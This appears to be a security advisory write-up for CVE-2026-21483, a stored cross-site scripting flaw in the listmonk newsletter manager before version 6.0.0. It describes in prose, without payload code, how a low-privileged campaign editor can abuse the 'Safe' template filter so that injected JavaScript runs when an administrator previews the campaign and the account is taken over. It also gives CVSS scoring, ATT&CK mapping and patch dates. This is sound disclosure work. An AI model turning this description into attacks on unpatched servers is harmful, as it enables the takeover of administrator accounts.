CVE-2026-21483

Trust Issues: Escalating from Newsletter Editor to God Mode in Listmonk

Alon Barad
Alon Barad
Software Engineer

Jan 2, 2026·6 min read·4 visits

Executive Summary (TL;DR)

Listmonk versions prior to 6.0.0 trusted user input a little too much. By abusing the 'Safe' template filter, an attacker with basic campaign editing rights can inject malicious JavaScript. When an administrator previews this campaign, the script executes, effectively handing over the keys to the kingdom.

A critical Stored XSS vulnerability in the popular self-hosted newsletter manager, listmonk, allows low-privileged users to hijack administrative accounts via unsafe template rendering.

Official Patches

ListmonkRelease v6.0.0 containing security fixes

Fix Analysis (1)

Technical Appendix

CVSS Score
8.0/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Affected Systems

listmonk < 6.0.0

Affected Versions Detail

Product
Affected Versions
Fixed Version
listmonk
listmonk
< 6.0.06.0.0
AttributeDetail
CWE IDCWE-79
Attack VectorNetwork (Stored XSS)
CVSS v3.18.0 (High)
Privileges RequiredLow (campaigns:manage)
User InteractionRequired (Admin views preview)
ImpactAccount Takeover / Privilege Escalation

MITRE ATT&CK Mapping

T1189Drive-by Compromise
Initial Access
T1059.007Command and Scripting Interpreter: JavaScript
Execution
T1098Account Manipulation
Persistence
CWE-79
Stored Cross-Site Scripting

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Known Exploits & Detection

Manual AnalysisStored XSS via campaign body using 'Safe' template filter.

Vulnerability Timeline

Patch Committed
2025-12-31
Public Disclosure & Release
2026-01-02